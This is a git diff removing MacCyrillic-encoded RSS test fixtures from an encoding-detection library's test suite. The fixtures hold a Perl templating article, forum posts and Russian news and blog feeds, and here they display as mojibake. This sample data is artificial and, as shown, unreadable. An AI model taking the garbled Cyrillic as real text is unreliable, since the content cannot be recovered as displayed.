cellpadding=1&gt;&lt;tr&gt;&lt;td bgcolor=&quot;#000000&quot;&gt; -45 &lt;table cellpadding=5&gt; -46 &lt;tr&gt;&lt;td bgcolor=&quot;#aaaaaa&quot; align=&quot;center&quot;&gt; -47 HTML -48 -49 if( $image-&gt;{url} ) -50 { -51 my $img = qq|&lt;img src=&quot;$$image{url}&quot; alt=&quot;$$channel{title}&quot;&gt;|; -52 print qq|&lt;a href=&quot;$$channel{link}&quot;&gt;$img&lt;/a&gt;&lt;br&gt;\n|; -53 } -54 else -55 { -56 print qq|&lt;a href=&quot;$$channel{link}&quot;&gt;$$channel{title}&lt;/a&gt;&lt;br&gt;\n|; -57 } -58 -59 print &lt;&lt;&quot;HTML&quot;; -60 &lt;font size=&quot;-1&quot;&gt;$$channel{description}&lt;/font&gt; -61 &lt;/td&gt;&lt;/tr&gt; -62 &lt;tr&gt;&lt;td bgcolor=&quot;#bbbbff&quot; width=200&gt;&lt;font size=&quot;-1&quot;&gt; -63 HTML -64 -65 foreach my $item ( @{ $rss-&gt;{items} } ) -66 { -67 print qq|&lt;b&gt;&gt;&lt;/b&gt;&lt;a href=&quot;$$item{link}&quot;&gt;$$item{title}&lt;/a&gt;&lt;br&gt;&lt;br&gt;\n|; -68 } -69 -70 print &lt;&lt;&quot;HTML&quot;; -71 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt; -72 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; -73 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; -74 HTML -75 -76 close $fh; -77 }</pre></div><br /><br /><span style="font-weight:bold">2. עהוכוםטו ןנוהסעאגכוםט.</span><br /><br />•מנמרטי הטחאים םו סגחגאוע סוב ס קאסעםל ןנוהסעאגכוםטול האםםץ. מ ןנמדנאללא המכזםא חאבנאע האםםו ט סהוכאע טץ המסעףןםלט קולף-עמ, קעמ טץ ןנוהסעאגכוע - עמ, קעמ נאבמעא‏ ס RSS םו המכזםמ טלוע חםאקוםט. למדף חאץמעוע ןנמטחגמהטע HTML, TeX, ןנמסעמי עוךסע, טכט האזו ךאךמי-עמ פמנלאע, ךמעמני םו למדף סובו ןנוהסעאגטע.<br /><br />‚מחלמזםמ ךעמ-עמ חאץמקוע םאןטסאע סמבסעגוםםף‏ סטסעולף הכ נאבמע ס ראבכמםאלט, םמ לםו םנאגטעס למהףכ Text::Template אנךא-„זויסמםא „מלטםףסא (Mark-Jason Dominus). ם הוכאוע גסו קעמ לםו םומבץמהטלמ, םו ענובףוע הכ סגמוי נאבמע המןמכםטעוכםץ ןנמדנאלל ט םאןטסאם ןמכםמסע‏ םא Perl. “ םודמ ןנמסעמי טםעונפויס ט לםו םו ענובףועס טחףקאע חך ראבכמםמג, ןמסךמכךף ראבכמם טסןמכחף‏ע Perl.<br /><br /><span style="font-style:italic">‹טסעטםד 2</span> - ‎עמ עא זו ןנמדנאללא, עמכךמ גלוסעמ גםוהנוםםמדמ HTML טסןמכחףועס Text::Template. ‚ סענמךו 5 טלןמנעטנף‏ לועמה fill_in_file(). ‚ סענמךו 13 ףךאחגא‏ ראבכמם, ךמעמני בףהף טסןמכחמגאע. ‚וס HTML, טסןמכחףולי ןנמדנאללמי, עוןונ גםוסום ג פאיכ ראבכמםא, ןנטגוהוםםי ג <span style="font-style:italic">כטסעטםדו 3</span>.<br /><br />מהףכ Text::Template למזוע ןנטםטלאע האםםו ךאך ץור. כ‏קט ץורא סעאםמגעס טלוםאלט ןונולוםםץ ג ראבכמםו, א חםאקוםט - חםאקוםטלט ןונולוםםץ ראבכמםא, א עאךזו מןנוהוכ‏ע עטן ןונולוםםץ. …סכט חםאקוםטו ץורא ןנמסעמי סךאכנ, ןונולוםםא ראבכמםא סךאכנ. …סכט חםאקוםטו ץורא - אםמםטלםי לאססטג, ןונולוםםא ראבכמםא - לאססטג, ט עאך האכוו.<br /><br />בתוךע, סמחהאגאולי XML::RSS - אםמםטלםי ץור. מהףכ ןנוהמסעאגכוע אבסענאךעםי טםעונפויס הכ סמחהאםט, םמ םו הכ המסעףןא. עמ מעקאסעט טלוםםמ עמ, קעמ המכזום ןונוהאע למולף ראבכמםף. ‚ ראבכמםו <span style="font-weight:bold">$rss-&gt;channel</span>, ךמעמנא ג ךאקוסעגו חםאקוםט סמהונזטע אםמםטלםי ץור, סעאםמגטעס <span style="font-weight:bold">%channel</span>, א <span style="font-weight:bold">$rss-&gt;items</span>, סמהונזאשא אםמםטלםי לאססטג סעאםמגטעס <span style="font-weight:bold">@items</span>.<br /><br /><span style="font-style:italic">‹טסעטםד 2: ˆסןמכחמגאםטו ראבכמםא.</span><br /><div class="code"><pre>1 #!/usr/bin/perl -w -2 use strict; -3 -4 use LWP::Simple; -5 use Text::Template qw(fill_in_file); -6 use XML::RSS; -7 -8 my @files = qw( -9 http://use.perl.org/useperl.rss -10 ); -11 -12 my $base = '.'; -13 my $template = 'rss-html.tmpl'; -14 -15 foreach my $url ( @files ) -16 { -17 my $file = $url; -18 -19 $file =~ s|.*/||; -20 -21 my $result = open my $fh, &quot;&gt; $base/$file.html&quot;; -22 -23 unless( $result ) -24 { -25 warn &quot;Could not open [$file] for writing! $!&quot;; -26 next; -27 } -28 -29 my $rss = XML::RSS-&gt;new(); -30 my $data = get( $url ); -31 $rss-&gt;parse( $data ); -32 -33 print fill_in_file( $template, HASH =&gt; $rss ); -34 close $fh; -35 }</pre></div><br /><br />‚םףענט ראבכמםא Text::Template טסןמכםוע בכמךט ךמהא, ךמעמנו מם םאץמהטע לוזהף פטדףנםלט סךמבךאלט. ם חאלוםוע בכמך ןמסכוהםטל גקטסכוםםל גנאזוםטול. ˆלוםא ןונולוםםץ - ךכ‏קט ץורא, ססכךף םא ךמעמני ןונוהאכ ג ךאקוסעגו אנדףלוםעא פףםךצטט fill_in_file() ג ךמהו, ןנטגוהוםםמל ג <span style="font-style:italic">כטסעטםדו 2</span>.<br /><br /><span style="font-style:italic">‹טסעטםד 3: HTML ראבכמם.</span><br /><div class="code"><pre>1 &lt;table cellpadding=1&gt;&lt;tr&gt;&lt;td bgcolor=&quot;#000000&quot;&gt; -2 &lt;table cellpadding=5&gt; -3 &lt;tr&gt; -4 &lt;td bgcolor=&quot;#aaaaaa&quot; align=&quot;center&quot;&gt; -5 &lt;a href=&quot;{ $channel{link} }&quot;&gt;{ -6 -7 $image ? qq|&lt;img src=&quot;$image&quot; alt=&quot;$channel{title}&quot;&gt;| : $channel{title} -8 -9 }&lt;/a&gt;&lt;br&gt; -10 -11 { $channel{description} } -12 &lt;/td&gt; -13 &lt;/tr&gt; -14 -15 &lt;tr&gt; -16 &lt;td bgcolor=&quot;#bbbbff&quot; width=200&gt;&lt;font size=&quot;-1&quot;&gt; -17 { -18 my $str; -19 -20 foreach my $item ( @items ) -21 { -22 $str .= qq|&lt;b&gt;&gt;&lt;/b&gt;&lt;a href=&quot;$$item{link}&quot;&gt;$$item{title}&lt;/a&gt;&lt;br&gt;&lt;br&gt;\n|; -23 } -24 -25 $str; -26 }&lt;/font&gt;&lt;/td&gt; -27 &lt;/tr&gt; -28 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; -29 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;</pre></div><br /><br />אך עמכךמ סטסעולא ראבכמםמג חאהויסעמגאםא, למדף לוםע ןנוהסעאגכוםטו םו לום כמדטךף ךמהא. …סכט ןנטלף נורוםטו טחלוםטע גטה ןנוהסעאגכוםט האםםץ, ןמלום‏ עמכךמ ראבכמם. …סכט לםו גלוסעמ HTML ענובףועס ןנמסעמי עוךסע, עמכךמ טחלום‏ ןמה םמגי פמנלאע ראבכמם, ךאך ‎עמ סהוכאםמ ג <span style="font-style:italic">כטסעטםדו 4</span>.<br /><br /><span style="font-style:italic">‹טסעטםד 4: ˜אבכמם הכ מבקםמדמ עוךסעא.</span><br /><div class="code"><pre>1 { $channel{title} } -2 -3 { $channel{description} } -4 -5 { -6 my $str; -7 -8 foreach my $item ( @items ) -9 { -10 $str .= qq|* $$item{title}\n|; -11 } -12 -13 $str; -14 }</pre></div><br /><br /><span style="font-weight:bold">3. עהוכוםטו ךמםפטדףנאצטט.</span><br /><br />•מנמרטי הטחאים עאךזו ןמחגמכוע אהאןעטנמגאע סךנטןע ך נאחכטקםמלף מךנףזוםט‏. ‚ <span style="font-style:italic">כטסעטםדו 1</span> זוסעךמ ןנמןטסאכ חםאקוםטו הטנוךעמנטט הכ גגמהא, קעמ הוכאוע למי סךנטןע ץנףןךטל - וסכט למ המלארם הטנוךעמנט ןמלוםועס, סךנטןע סכמלאועס. נמלו עמדמ <span style="font-style:italic">ג כטסעטםדו 2</span> זוסעךמ ןנמןטסאםמ טל ראבכמםא, םוסלמענ םא עמ קעמ למדף לוםע ןנוהסעאגכוםטו, טחלום ראבכמם. םו םףזםמ טלוע גמחלמזםמסע האגאע ךאזהמלף ראבכמםף סמהונזאעוכםמו טל גלוסעמ טסןמכחמגאםט מהםמדמ ט עמדמ זו טלוםט הכ נאחםמדמ סמהונזטלמדמ.<br /><br />םמדטו סגמבמהםמ-המסעףןםו סךנטןע, ךמעמנו םארוכ ג ˆםעונםוע ענובף‏ע, קעמב ןמכחמגאעוכ מענוהאךעטנמגאכ גונץם‏‏ קאסע סךנטןעא טכט גךכ‏קאולף‏ בטבכטמעוךף, ךמעמנא סמהונזטע עמכךמ ךמםפטדףנאצטמםםו האםםו. ’אךמי ןמהץמה ענובףוע, קעמב ךמםוקםי ןמכחמגאעוכ חםאכ מסםמג חךא ןנמדנאללטנמגאםט ט ןנאגטכ סךנטןע - מרטבךא סכמלאוע סךנטןע. כמץטו ךמםפטדףנאצטמםםו האםםו למדףע ןנטגוסעט ך םומזטהאםםל נוחףכעאעאל, םמ מםט םו ןמכמלא‏ע ןנמדנאללף.<br /><br /> למדף ףךאחאע עוךףשטו ךמםפטדףנאצטמםםו האםםו םוסךמכךטלט סןמסמבאלט ט ןמךאזף עמכךמ מהטם טח םטץ. €נץטג Comprehensive Perl Archive Network (CPAN)<span style="font-weight:bold"><sup>2</sup></span> סמהונזטע םוסךמכךמ למהףכוי הכ נאחבמנא ךמםפטדףנאצטמםםץ פאיכמג ג נאחכטקםץ פמנלאעאץ טכט אנדףלוםעמג ךמלאםהםמי סענמךט. „טחאיםונ המכזם גבטנאע ןמהץמה, ךמעמני ףהמגכועגמנוע טץ םףזהאל.<br /><br />מדהא גןונגו םאקאכ מעהוכע האםםו ךמםפטדףנאצטט מע למטץ סךנטןעמג, ןונובנאכ םוסךמכךמ למהףכוי םא CPAN ט מסעאםמגטכס םא ConfigReader::Simple, ךמעמני טסןמכחףוע ןמסענמקםי פמנלאע ךכ‏ק-חםאקוםטו. טסןמכחמגאכ ודמ םאסעמכךמ קאסעמ, קעמ םאקאכ מעןנאגכע למט טחלוםוםט וךף בונטםף (Bek Oberin), אגעמנף מנטדטםאכםמי גונסטט, חאעול ןמכםמסע‏ גחכ םא סוב ןמההונזךף למהףכ.<br /><br /><span style="font-style:italic">‹טסעטםד 5</span> אהאןעטנףוע <span style="font-style:italic">כטסעטםד 2</span> ך טסןמכחמגאםט‏ ConfigReader::Simple. סמחהא‏ םמגי מבתוךע ךמםפטדףנאצטט, חאעול קטעא‏ חםאקוםט טח מבתוךעא. מהףכ ןנומבנאחףוע טלוםא ךכ‏קוי ךמםפטדףנאצטט ג טלוםא לועמהמג הכ ןנמסעמדמ המסעףןא (ץמע הכ המסעףןא ך חםאקוםטל ךכ‏קוי ס ‎ךחמעטקוסךטלט טלוםאלט, ךמעמנו םו למדףע בע ןנומבנאחמגאם ג טהוםעטפטךאעמנ Perl ןנטץמהטעס טסןמכחמגאע לועמה get()). <span style="font-style:italic">‹טסעטםד 6</span> סמהונזטע ךמםפטדףנאצטמםםי פאיכ.<br /><br /><span style="font-style:italic">‹טסעטםד 5: ˆסןמכחמגאםטו ConfigReader::Simple.</span><br /><div class="code"><pre>1 #!/usr/bin/perl -w -2 use strict; -3 -4 use ConfigReader::Simple; -5 use LWP::Simple; -6 use Text::Template qw(fill_in_file); -7 use XML::RSS; -8 -9 my $config = ConfigReader::Simple-&gt;new( './rss.config' ); -10 -11 my $base = $config-&gt;base; -12 my $template = $config-&gt;template; -13 my $extension = $config-&gt;extension; -14 -15 my @files = split /\s+/, $config-&gt;files; -16 -17 foreach my $url ( @files ) -18 { -19 my $file = $url; -20 -21 $file =~ s|.*/||; -22 -23 my $result = open my $fh, &quot;&gt; $base/$file.$extension&quot;; -24 -25 unless( $result ) -26 { -27 warn &quot;Could not open [$file] for writing! $!&quot;; -28 next; -29 } -30 -31 my $rss = XML::RSS-&gt;new(); -32 my $data = get( $url ); -33 $rss-&gt;parse( $data ); -34 -35 print $fh fill_in_file( $template, HASH =&gt; $rss ); -36 close $fh; -37 }</pre></div><br /><span style="font-style:italic">‹טסעטםד 6: ”איכ ךמםפטדףנאצטט.</span><br /><div class="code"><pre>1 base . -2 template rss-html.tmpl -3 files http://use.perl.org/useperl.rss -4 extension html</pre></div><br /><br /><span style="font-weight:bold">4. ‡אךכ‏קוםטו.</span><br /><br /> למדף ףלוםרטע נאחלונ למטץ ןנמדנאלל, מעהוכ ךמה מע כמדטךט ןנוהסעאגכוםט ט ךמםפטדףנאצטמםםמי טםפמנלאצטט. עמ נאחהוכוםטו הוכאוע ןנמדנאללף במכוו דטבךמי ט ןנמסעמי ג אהאןעאצטט ך םמגל מךנףזוםטל. ˜אבכמם ןמחגמכ‏ע טחלוםע גגמה, א ךמםפטדףנאצטמםםו פאיכ ףןנאגכע נאבמעמי ןנמדנאלל בוח טחלוםוםט ךמהא. Text::Template ט ConfigReader::Simple הוכא‏ע ‎עמ םאסעמכךמ ןנמסעל, םאסךמכךמ גמחלמזםמ.<br /><br /><span style="font-weight:bold">5. ‘סכךט</span><br /><br />‚סו למהףכט, ףןמלטםאולו ג ‎עמי סעאעו, למזםמ םאיעט םא Comprehensive Perl Archive Network (CPAN) - <a target="_blank" href="http://search.cpan.org">http://search.cpan.org</a><br /><br /><span style="font-weight:bold">6. ב אגעמנו.</span><br /><br />נאיאם הו ”מי (brian d foy) - טחהאעוכ <span style="font-style:italic">The Perl Review</span>.<br /><br /><span style="font-weight:bold">נטלוקאםט.</span><br /><br /><span style="font-weight:bold"><sup>1</sup></span> &quot;Simple RSS with Perl&quot; by brian d foy, The Perl Review v0 i5, November 2002, <a target="_blank" href="http://www.theperlreview.com">http://www.ThePerlReview.com</a><br /><br /><span style="font-weight:bold"><sup>2</sup></span> <a target="_blank" href="http://search.cpan.org">http://search.cpan.org</a><br /><br /><a target="_blank" href="http://www.theperlreview.com/Articles/v0i7/config.pdf">מנטדטםאכ סעאעט םא Perl Review (PDF)</a> - - ‹מבאםמג ˆדמנ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-53.html - „נףדטו עול, סגחאםםו ס ראבכמםאלט ט Perl - http://forum.template-toolkit.ru/view_topic/topic_id-53.html?rss - - - diff --git a/chardet/tests/MacCyrillic/forum.template-toolkit.ru.9.xml b/chardet/tests/MacCyrillic/forum.template-toolkit.ru.9.xml deleted file mode 100644 index 855dffe..0000000 --- a/chardet/tests/MacCyrillic/forum.template-toolkit.ru.9.xml +++ /dev/null @@ -1,55 +0,0 @@ - - - - - ”מנףל Template Toolkit : חך ןנמדנאללטנמגאםט Perl - http://forum.template-toolkit.ru/view_forum/forum_id-9.html?rss - Template Toolkit - בסענא, למשםא ט נאסרטנולא סטסעולא מבנאבמעךט ראבכמםמג. א סאיעו נאבמעאוע פמנףל, ג ךמעמנמל מבסףזהא‏עס גמןנמס טסןמכחמגאםט בטבכטמעוךט ןמ נאבמעו ס ראבכמםאלט. ’ול, סגחאםםו ס ןנמדנאללטנמגאםטול ג Perl - ru - Lobanov Igor - Lobanov Igor <webmaster@template-toolkit.ru> - Sun, 4 Dec 2005 16:14:30 GMT - Wed, 4 Jan 2006 02:29:01 GMT - Perl script, Template Toolkit - - http://forum.template-toolkit.ru/images/tt2powered.gif - Template Toolkit - ראבכמם ג perl - http://forum.template-toolkit.ru/ - 88 - 31 - - http://blogs.law.harvard.edu/tech/rss - - http://forum.template-toolkit.ru/view_topic/topic_id-119.html?rss - Sun, 4 Dec 2005 16:09:31 GMT - וסןכאעםי Perl-נוהאךעמנ - http://forum.template-toolkit.ru/view_topic/topic_id-119.html?rss - וסןכאעםי Perl-נוהאךעמנ הכ Windows ס לםמזוסעגוםםלט טםסענףלוםעאלט מעכאהךט סךנטןעמג.<br /> -<br /> -URL חאדנףחךט: <br /> -http://www.perl-express.com/PeSetRussv245.exe<br /> -„מלארם סענאםטצא: <br /> -http://www.perl-express.com/ru/ - - mixail <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-119.html - „נףדטו עול, סגחאםםו ס ראבכמםאלט ט Perl - http://forum.template-toolkit.ru/view_topic/topic_id-119.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-56.html?rss - Thu, 20 Jan 2005 10:34:47 GMT - JAPH - http://forum.template-toolkit.ru/view_topic/topic_id-56.html?rss - perl5.8<br /><div class="code"><pre>eval qq{#line $$ &quot;just another perl hacker&quot;\ndie};$@=~/j.+r/;print$&amp;;</pre></div> - - LIOL <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-56.html - „נףדטו עול, סגחאםםו ס ראבכמםאלט ט Perl - http://forum.template-toolkit.ru/view_topic/topic_id-56.html?rss - - - diff --git a/chardet/tests/MacCyrillic/greek.ru.xml b/chardet/tests/MacCyrillic/greek.ru.xml deleted file mode 100644 index c734ea2..0000000 --- a/chardet/tests/MacCyrillic/greek.ru.xml +++ /dev/null @@ -1,45 +0,0 @@ - - - - - - Greek.Ru - מקעט גסו מ דנוקוסךמל םא נףססךמל. ƒנוצט. טןנ - http://www.greek.ru - - - - Greek.Ru - http://www.greek.ru/ru/news/ya/grekru.gif - http://www.greek.ru - 88 - 31 - - - - ƒנוצט סודמהם: €”ˆ› ’‘ ‘ ‘’ˆ’“–ˆ…‰ - http://www.greek.ru/ru/news/news_detail.php?ID=994 - ‚כאסעט €פטם םאקאכט ךאלןאםט‏ "ןמ מדנאםטקוםט‏ ןנמסעטעףצטט ט םוחאךמםםמי אךעטגםמסעט טםהףסענטט סוךסא". - - - - ƒנוצט סודמהם: ‚ ƒנוצטט אנוסעמגאם קועגונמ בנטעאםצוג חא טחבטוםטו גכאהוכצא מהםמדמ טח לאדאחטםמג - http://www.greek.ru/ru/news/news_detail.php?ID=996 - ‚ ƒנוצטט אנוסעמגאם קועגונמ בנטעאםצוג - גסו קכום מהםמי סולט, ךמעמנו סטכםמ טחבטכט גכאהוכצא םובמכרמדמ לאדאחטםקטךא בכטח "עףנטסעטקוסךמי וךךט" - אפטםסךמדמ €ךנמןמכ. - - - - - טןנ סודמהם: ’ףנךט-ךטןנטמע ןנוהכאדא‏ע מסגמבמהטע טןנ מע לטם - http://www.greek.ru/ru/news/news_detail.php?ID=990 - ‹טהונ עףנמך-ךטןנטמעמג אףפ „וםךעאר גסךאחאכס חא כטךגטהאצט‏ לטםםץ ןמכוי גהמכ הולאנךאצטמםםמי כטםטט, נאחהוכ‏שוי מסענמג םא דנוקוסךף‏ ט עףנוצךף‏ קאסעט. - - - - - טןנ סודמהם: €’’ˆ‹€ €…‘ “„€ ˆ“ 29 ‹…’ €‡€„ - http://www.greek.ru/ru/news/news_detail.php?ID=952 - וסןףבכטךא טןנ ט גוס דנוקוסךטי לטנ מעלועטכט 20 ט‏כ ענאףנםף‏ האעף סגמוי טסעמנטט. מגםמ 29 כוע םאחאה ג ץמהו מןונאצטט \ No newline at end of file diff --git a/chardet/tests/MacCyrillic/intertat.ru.xml b/chardet/tests/MacCyrillic/intertat.ru.xml deleted file mode 100644 index db26a9b..0000000 --- a/chardet/tests/MacCyrillic/intertat.ru.xml +++ /dev/null @@ -1,6 +0,0 @@ - - -וסןףבכטךאםסךא ‎כוךענמםםא דאחועא Intertat.RU“קנוהטעוכול € ƒ Intertat.RU גכועס ךאבטםוע טםטסענמג וסןףבכטךט ’אעאנסעאם. "Intertat.RU" סמחהאםא מסעאםמגכוםטול נאגטעוכסעגא וסןףבכטךט ’אעאנסעאם סמדכאסםמ “ךאחף נוחטהוםעא ’ ג 2001 דמהף. ‡אנודטסענטנמגאםמ טםטסעונסעגמל ןוקאעט ט עוכונאהטמגושאםט ”. ‘גטהועוכסעגמ מ נודטסענאצטט ‘ˆ כ \ No newline at end of file diff --git a/chardet/tests/MacCyrillic/kapranoff.ru.xml b/chardet/tests/MacCyrillic/kapranoff.ru.xml deleted file mode 100644 index 56f8d5e..0000000 --- a/chardet/tests/MacCyrillic/kapranoff.ru.xml +++ /dev/null @@ -1,161 +0,0 @@ - - - - - -Kappa's Lair v2.0 -http://kapranoff.ru/ - -en-us - -2003-12-18T17:40:29+03:00 - - - - - - - - - - - - - - - - - - - - - - - - - -ןףכ‏ל-ןףכ‏ל -http://kapranoff.ru/archives/003663.html - - -kappa -2003-12-18T17:40:29+03:00 - - -”מכךכמנ -http://kapranoff.ru/archives/003662.html - - -kappa -2003-12-18T15:46:04+03:00 - - -<![CDATA[€ ג דמגמנטעו — הםוגםטךט...]]> -http://kapranoff.ru/archives/003661.html -“םטךאכםי, םא למי גחדכה, ןנמהףךע ךמככוךעטגםמדמ עגמנקוסעגא. םטדא צוכא. ו ןמזאכוועו. מרךט לרךמי. הםאזה סמכםוקםמי ןמנמי, כ הום המזהכטג ט... - -kappa -2003-12-17T16:54:58+03:00 - - -ף‎םהמכטםא -http://kapranoff.ru/archives/003660.html -ףססךטי סאיע מ דףבםץ דאנלמרךאץ ט טדנו םא םטץ. איפ. „אגםמ ץמעוכ םאןטסאע מ םל, הא גמע חאבגאכ גס. Lonesome... - -kappa -2003-12-17T13:49:03+03:00 - - -ךאלב‎ך -http://kapranoff.ru/archives/003659.html -‡הנאסעו גאל ס ץגמסעטךמל. למד ב לםמדמ םאןטסאע מ עמל, קול חאםטלאכס גס‏ ‎עף םוהוכ‏. םו כום. גקטםךא םו... - -kappa -2003-12-17T13:42:39+03:00 - - -ול בע? -http://kapranoff.ru/archives/003657.html -‘בנוםהטכ, גטהטלמ, גאר ןמךמנםי ס ףלא סמגסול מע בוחהוכ. ‘טזף גמע, ענאקף בוחףלםו הוםדט ג בנםסךמל טםעונםועו, ןנמץמזף עוסע םא... - -kappa -2003-12-13T12:15:13+03:00 - - -„ום ךמםסעטעףצטט -http://kapranoff.ru/archives/003656.html -—וכמגוקוך, ךמעמני סהוכאכ לום לוכמלאםמל, סודמהם מעלוקאוע סגמ הוםנמזהוםטו :) “נא, עאך ןמכאדא‏, הא גוה? מסגשא‏ וי גץמה געמנמדמ... - -kappa -2003-12-12T15:18:10+03:00 - - -כעהבנ -http://kapranoff.ru/archives/003655.html - - -kappa -2003-12-09T17:51:23+03:00 - - -‘אלמו מםמ -http://kapranoff.ru/archives/003646.html - - -kappa -2003-12-07T23:09:31+03:00 - - -‘ןמנע-ךסןנוסס סממבשאוע -http://kapranoff.ru/archives/003654.html - - -kappa -2003-12-06T18:19:27+03:00 - - -‡ולכםו-3 -http://kapranoff.ru/archives/003653.html - „וגמקךא ט האכאי-כאלא. ƒוםטאכםמ. ‡הוס גס.... - -kappa -2003-12-05T13:34:08+03:00 - - -ףחךא ס םאלט -http://kapranoff.ru/archives/003652.html - ףןטכ גמע. מנאהמגאכ סעאנטךא. ‘וב.... - -kappa -2003-12-04T19:56:54+03:00 - - -מגמסעום -http://kapranoff.ru/archives/003651.html -€ ףסאעי וגךטם סמ עמגאנטשט חאךאםקטגאוע חאןטס םמגמדמ אכבמלא. ‚ סףבבמעף מםט, ךסעאעט, בףהףע ג –„•. למזוע בע סץמזף.... - -kappa -2003-12-04T18:58:46+03:00 - - -‘טםטי גמכ, טסןמכםוםםי מקוי -http://kapranoff.ru/archives/003650.html -ƒ מ גסךמל נאחםמל. מילטעו, וסע , ןטרף ןוסםט, טץ ןמ‏, ף לום וסע סגמ ‎סעועטךא. ˆ וסע... - -kappa -2003-12-03T22:44:54+03:00 - - -גזטך-גזטך -http://kapranoff.ru/archives/003649.html -€ , לוזהף עול, גונםףכס טח נםסךא. ’אךטו הוכא.... - -kappa -2003-12-03T11:37:49+03:00 - - - - diff --git a/chardet/tests/MacCyrillic/koi.kinder.ru.xml b/chardet/tests/MacCyrillic/koi.kinder.ru.xml deleted file mode 100644 index c3d2717..0000000 --- a/chardet/tests/MacCyrillic/koi.kinder.ru.xml +++ /dev/null @@ -1,68 +0,0 @@ - - - - -Kinder.ru - „ועסךטו םמגמסעט -http://kinder.ru/ -Kinder.ru - „ועסךטו םמגמסעט -ru -otter@kinder.ru -kinder -10 - -http://www.kinder.ru/banners/just-button3.gif -מגמסעט Kinder.ru -http://kinder.ru/ -88 -31 -kinder.ru - - - - -„ועסךטי זףנםאכ "כןא" -‚רוכ פוגנאכסךטי םמלונ "כן".
    - םו קטעאעוכט חאהא‏ע לםמדמ גמןנמסמג.
    - "מדהא םאקאכט טדנאע ג ץמךךוי? אך ןמגטכס רמךמכאה? מקולף ב‏ע באךכףרט? - —עמ חא ךאלום - טחףלנףה? מקולף כ‏הט ךמככוךצטמםטנף‏ע מעךנעךט?"
    - כןא, ”טכטןןק ט אןט-אןט ןנמגוכט נאססכוהמגאםטו ט ס ףהמגמכסעגטול - מעךנגא‏ע הכ כ‏במחםאעוכםץ ‹€לאםמג מעגוע םא ‎עט גמןנמס, א - עאךזו לםמדמ הנףדמי טםעונוסםמי ט ןמחםאגאעוכםמי טםפמנלאצטט.
    [מהנמבםוו...]]]>
    -http://www.kinder.ru/redir.asp?id=845 -Fri, 04 Mar 2005 15:21:02 +0300 -otter@kinder.ru -
    - - -„ועסךטי המל 18 ד.מסךג -‘ףןונאכבמל "עמ ˆץ „ועסעגמ" ןמןמכםטכס וש מהםטל המכדמזהאםםל םובמכרטל פמעמאכבמלמל "אכרט ג באססויםו". „ועסךטי המל בכאדמהאנטע גסוץ עוץ כ‏הוי, ךמעמנו סלמדכט ןמהאנטע לאכראל םומבץמהטלו הכ םטץ ןנמצוהףנ. ‡המנמגו ט ףכבךט םארטץ הועוי ֵ חאכמד גארוי בוחדנאםטקםמי שוהנמסעט!
    [מהנמבםוו...]]]>
    -http://www.kinder.ru/redir.asp?id=2736 -Fri, 04 Mar 2005 15:19:51 +0300 -otter@kinder.ru -
    - - -‚וסוםםטו ךאםטךףכ ג כאדונו "כאםועא לוקע. ‚וסםא." -‚וסםא. נוהקףגסעגטו מבםמגכוםט ט קודמ-עמ םמגמדמ ט סגוזודמ ג םארוי זטחםט. ‘אלמו גנול ןמדמגמנטע ט ןמנאחלרכע מ כ‏בגט ט הנףזבו. € ס ךול ‎עמ למזםמ מבסףהטע? ‘ נמהטעוכלט? ‘ הנףחלט? •מנמרמ ב, םמ םו גסודהא ןמכףקאועס. € וסכט ס ןנמפוססטמםאכמל? ‘ ןסטץמכמדמל? מ-למולף, בכוסעשא טהו. ‘מדכאסם? ’מדהא ןנטסמוהטםיעוס!!!
    -‘’עףנס ןנוהכאדאוע ‚אל ןנמדנאללף הועסךמדמ מעהץא ג הועסךמל מחהמנמגטעוכםמל ךמלןכוךסו "‹טעגטםמגמ".
    [מהנמבםוו...]]]>
    -http://www.kinder.ru/obzor/spb_tur_1.htm -Fri, 04 Mar 2005 15:17:24 +0300 -otter@kinder.ru -
    - - -מסךמגסךטי הועסךטי עואענ עוםוי - 200-כועםולף ‏בטכו‏ ƒ.•.€םהונסוםא ג עואענו ןנולונא - סןוךעאךכ "„‏ילמגמקךא".
    -מחםאךמלעוס ס נוןונעףאנמל עואענא םא לאנע ט אםמעאצטלט ך סןוךעאךכל.
    -ונוה ךאזהל סןוךעאךכול ג פמיו עואענא ןנמגמהעס ךמםסףכעאצטט ןמ לועמהטךו עגמנקוסךמדמ נאחגטעט הועוי ג סולו. -
    [מהנמבםוו...]]]>
    -http://www.kinder.ru/teatr_tenei/obzor_dtt_1.htm -Wed, 02 Mar 2005 17:14:18 +0300 -otter@kinder.ru -
    - - -ƒאחועא-אכלאםאץ (סאיע רךמכ \ No newline at end of file diff --git a/chardet/tests/MacCyrillic/money.rin.ru.xml b/chardet/tests/MacCyrillic/money.rin.ru.xml deleted file mode 100644 index 0258745..0000000 --- a/chardet/tests/MacCyrillic/money.rin.ru.xml +++ /dev/null @@ -1,112 +0,0 @@ -<?xml version="1.0" encoding="MacCyrillic"?> -<!-- -Source: http://money.rin.ru/news/rss/ -Expect: MacCyrillic ---> -<!DOCTYPE rss PUBLIC "-//Netscape Communications//DTD RSS 0.91//EN" "http://my.netscape.com/publish/formats/rss-0.91.dtd"> -<rss version="0.91"> - -<channel> -<title>ךמםמלטךא ט פטםאםס -http://money.rin.ru -ךמםמלטקוסךטו ט פטםאםסמגו םמגמסעט -ru-ru -Copyright 2003, Greenline, Kazan, Russia -Wed, 04 Jan 2006 02:20:05 GMT -Wed, 04 Jan 2006 02:20:05 GMT -http://backend.userland.com/rss091 -money@rin.ru -webmaster@dionys.pp.ru - - -‘ˆ’…‘ םו ףעגונהטכא ךגמע םא ‎ךסןמנע קונםמי טךנ ט מסוענמגץ -http://money.rin.ru/content/news/?id=106325&from=rss -‘וךנועאנטאע מםגוםצטט מ לוזהףםאנמהםמי עמנדמגכו הטךטלט גטהאלט פאףם ט פכמנ, םאץמהשטלטס ןמה ףדנמחמי טסקוחםמגוםט (‘ˆ’…‘), חאגטכ גמ געמנםטך, קעמ םו סלמזוע ףעגונהטע ךגמע םא ‎ךסןמנע קונםמי טךנ ט מסוענמגץ םא 2006 דמה המ עוץ ןמנ, ןמךא סענאם-ןנמטחגמהטעוכט םו 